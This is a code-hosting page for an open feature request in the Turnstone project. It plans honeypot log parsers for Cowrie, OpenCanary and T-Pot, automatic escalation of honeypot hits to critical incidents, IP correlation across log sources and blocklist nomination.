Circuit-Forge/turnstone
5
0
Fork 0
Code Issues 11 Pull requests 1 Projects Releases 6 Packages Wiki Activity Actions

feat: honeypot log ingestion — Cowrie, OpenCanary, T-Pot parsers + guaranteed-malicious alerting #67

New issue
Open
opened 2026-06-17 11:37:15 -07:00 by pyr0ball · 0 comments
pyr0ball commented 2026-06-17 11:37:15 -07:00
Owner
Copy link

Context: Turnstone has FTS5 search, anomaly scoring, and cybersec zero-shot scoring. This issue tracks the ingestion pipeline work to bring honeypot log sources into Turnstone with guaranteed-malicious auto-escalation and cross-source IP correlation. Supersedes/extends #58 (which covers deploying the honeypot; this covers Turnstone parsing and alerting).

Plan: circuitforge-plans/turnstone/superpowers/plans/2026-06-17-honeypot-ai-threat-integration.md — Track A

Scope:

  • sources.yaml schema: honeypot: true flag + validation
  • app/ingest/parsers/cowrie.py — NDJSON parser, eventid-to-tag mapping
  • app/ingest/parsers/opencanary.py — JSON parser, logtype integer-to-tag mapping
  • app/ingest/parsers/tpot.py — Elastic-format parser with sub-service delegation
  • patterns/honeypot.yaml — 4 new tags: honeypot_hit, honeypot_credential_attempt, honeypot_exploit_attempt, honeypot_scan (CRITICAL/HIGH)
  • Auto-escalation fast-path in app/ingest/pipeline.py — bypasses anomaly scoring, creates CRITICAL incident with auto_escalated=true
  • Background IP correlation query across non-honeypot sources; correlated_sources attached to incident
  • Incident detail UI: "This IP also appeared in: [sources]" section
  • Auto-nominate honeypot IPs to blocklist_candidates with status: approved
  • firewall_block_candidates table schema (for future router API adapter use)
  • Unit tests for all 3 parsers; integration test: honeypot ingest → CRITICAL incident

Out of scope: Deploying honeypot infrastructure (#58), router firewall API adapters (backlog), ML fine-tuning on honeypot data.

Acceptance criteria:

  • Cowrie NDJSON file with cowrie.login.failed ingests as CRITICAL incident with auto_escalated=true
  • Sources without honeypot: true are unaffected by the new fast-path
  • Honeypot hit IP that also appears in nginx logs shows correlated sources on incident detail
  • Source IP appears in blocklist_candidates with status: approved immediately after ingestion
  • All existing tests pass

Related: Plan doc — circuitforge-plans/turnstone/superpowers/plans/2026-06-17-honeypot-ai-threat-integration.md | Infrastructure — #58

**Context:** Turnstone has FTS5 search, anomaly scoring, and cybersec zero-shot scoring. This issue tracks the ingestion pipeline work to bring honeypot log sources into Turnstone with guaranteed-malicious auto-escalation and cross-source IP correlation. Supersedes/extends #58 (which covers deploying the honeypot; this covers Turnstone parsing and alerting). **Plan:** `circuitforge-plans/turnstone/superpowers/plans/2026-06-17-honeypot-ai-threat-integration.md` — Track A **Scope:** - [ ] `sources.yaml` schema: `honeypot: true` flag + validation - [ ] `app/ingest/parsers/cowrie.py` — NDJSON parser, eventid-to-tag mapping - [ ] `app/ingest/parsers/opencanary.py` — JSON parser, logtype integer-to-tag mapping - [ ] `app/ingest/parsers/tpot.py` — Elastic-format parser with sub-service delegation - [ ] `patterns/honeypot.yaml` — 4 new tags: honeypot_hit, honeypot_credential_attempt, honeypot_exploit_attempt, honeypot_scan (CRITICAL/HIGH) - [ ] Auto-escalation fast-path in `app/ingest/pipeline.py` — bypasses anomaly scoring, creates CRITICAL incident with `auto_escalated=true` - [ ] Background IP correlation query across non-honeypot sources; `correlated_sources` attached to incident - [ ] Incident detail UI: "This IP also appeared in: [sources]" section - [ ] Auto-nominate honeypot IPs to `blocklist_candidates` with `status: approved` - [ ] `firewall_block_candidates` table schema (for future router API adapter use) - [ ] Unit tests for all 3 parsers; integration test: honeypot ingest → CRITICAL incident **Out of scope:** Deploying honeypot infrastructure (#58), router firewall API adapters (backlog), ML fine-tuning on honeypot data. **Acceptance criteria:** - [ ] Cowrie NDJSON file with `cowrie.login.failed` ingests as CRITICAL incident with `auto_escalated=true` - [ ] Sources without `honeypot: true` are unaffected by the new fast-path - [ ] Honeypot hit IP that also appears in nginx logs shows correlated sources on incident detail - [ ] Source IP appears in `blocklist_candidates` with `status: approved` immediately after ingestion - [ ] All existing tests pass **Related:** Plan doc — `circuitforge-plans/turnstone/superpowers/plans/2026-06-17-honeypot-ai-threat-integration.md` | Infrastructure — #58
pyr0ball added the
enhancement
 label 2026-06-17 11:37:15 -07:00
Sign in to join this conversation.
No Branch/Tag specified
Branches Tags
main
feat/42-50-postgres-multitenant
feat/32-domain-view
feat/15-hybrid-rag
feat/41-hybrid-bert-shim
feat/60-incidents-db
feat/pipeline-cleanup
feat/29-multi-agent-diagnose
feat/ssh-remote-glean
feat/live-watch
feat/llm-reasoning
feat/frictionless-capture
v0.7.0
v0.6.2
v0.6.1
v0.6.0
v0.5.0
v0.4.0
v0.3.0
v0.2.0
v0.1.0
Labels
Clear labels   
compliance

   
demo

   
deployment

   
docs

   
enhancement

   
parser

   
patterns

   
performance

   
security

   
ux
No labels
compliance
demo
deployment
docs
enhancement
parser
patterns
performance
security
ux
Milestone
Clear milestone
No items
No milestone
Projects
Clear projects
No items
No project
Assignees
Clear assignees
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference: Circuit-Forge/turnstone#67
No description provided.
Delete branch "%!s()"

Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?